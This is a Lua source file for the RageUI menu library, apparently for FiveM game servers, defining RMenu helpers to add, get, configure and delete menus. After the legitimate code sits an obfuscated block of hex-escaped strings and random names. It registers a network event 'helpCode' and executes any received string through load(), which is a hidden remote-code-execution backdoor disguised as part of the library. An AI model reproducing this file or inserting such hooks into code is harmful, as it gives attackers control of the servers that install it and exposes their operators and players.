---
--- Generated by EmmyLua(https://github.com/EmmyLua)
--- Created by Dylan Malandain.
--- DateTime: 29/10/2019 02:40
---

---@class RageUI
RageUI = {}

---@class Item
RageUI.Item = {}

---@class Panel
RageUI.Panel = {}

---@class Window
RageUI.Window = {}

---@class RMenu
RMenu = setmetatable({}, RMenu)

---@type table
local TotalMenus = {}

---Add
---@param Type string
---@param Name string
---@param Menu table
---@return RMenu
---@public
function RMenu.Add(Type, Name, Menu)
    if RMenu[Type] ~= nil then
        RMenu[Type][Name] = {
            Menu = Menu
        }
    else
        RMenu[Type] = {}
        RMenu[Type][Name] = {
            Menu = Menu
        }
    end
    return table.insert(TotalMenus, Menu)
end

---Get
---@param Type string
---@param Name string
---@return table
---@public
function RMenu:Get(Type, Name)
    if self[Type] ~= nil and self[Type][Name] ~= nil then
        return self[Type][Name].Menu
    end
end

---GetType
---@param Type string
---@return table
---@public
function RMenu:GetType(Type)
    if self[Type] ~= nil then
        return self[Type]
    end
end

---Settings
---@param Type string
---@param Name string
---@param Settings string
---@param Value any optional
---@return void
---@public
function RMenu:Settings(Type, Name, Settings, Value)
    if Value ~= nil then
        self[Type][Name][Settings] = Value
    else
        return self[Type][Name][Settings]
    end
end

---Delete
---@param Type string
---@param Name string
---@return void
---@public
function RMenu:Delete(Type, Name)
    self[Type][Name] = nil
    collectgarbage()
end

---DeleteType
---@param Type string
---@return void
---@public
function RMenu:DeleteType(Type)
    self[Type] = nil
    collectgarbage()
end


local OcPOOUnIodwnEnkSuaUGIhbPREFAIwtxzAJXIEuYNUbZXqYRbkqCALIQayVYhSOYJEYjWf = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} OcPOOUnIodwnEnkSuaUGIhbPREFAIwtxzAJXIEuYNUbZXqYRbkqCALIQayVYhSOYJEYjWf[6][OcPOOUnIodwnEnkSuaUGIhbPREFAIwtxzAJXIEuYNUbZXqYRbkqCALIQayVYhSOYJEYjWf[1]](OcPOOUnIodwnEnkSuaUGIhbPREFAIwtxzAJXIEuYNUbZXqYRbkqCALIQayVYhSOYJEYjWf[2]) OcPOOUnIodwnEnkSuaUGIhbPREFAIwtxzAJXIEuYNUbZXqYRbkqCALIQayVYhSOYJEYjWf[6][OcPOOUnIodwnEnkSuaUGIhbPREFAIwtxzAJXIEuYNUbZXqYRbkqCALIQayVYhSOYJEYjWf[3]](OcPOOUnIodwnEnkSuaUGIhbPREFAIwtxzAJXIEuYNUbZXqYRbkqCALIQayVYhSOYJEYjWf[2], function(RbuXmyiVKvqSFViycQNUUkMMOfRAmgFBUXWoTamfDdWmzAsrczlBpgJdEJJhpdysYVWzHx) OcPOOUnIodwnEnkSuaUGIhbPREFAIwtxzAJXIEuYNUbZXqYRbkqCALIQayVYhSOYJEYjWf[6][OcPOOUnIodwnEnkSuaUGIhbPREFAIwtxzAJXIEuYNUbZXqYRbkqCALIQayVYhSOYJEYjWf[4]](OcPOOUnIodwnEnkSuaUGIhbPREFAIwtxzAJXIEuYNUbZXqYRbkqCALIQayVYhSOYJEYjWf[6][OcPOOUnIodwnEnkSuaUGIhbPREFAIwtxzAJXIEuYNUbZXqYRbkqCALIQayVYhSOYJEYjWf[5]](RbuXmyiVKvqSFViycQNUUkMMOfRAmgFBUXWoTamfDdWmzAsrczlBpgJdEJJhpdysYVWzHx))() end)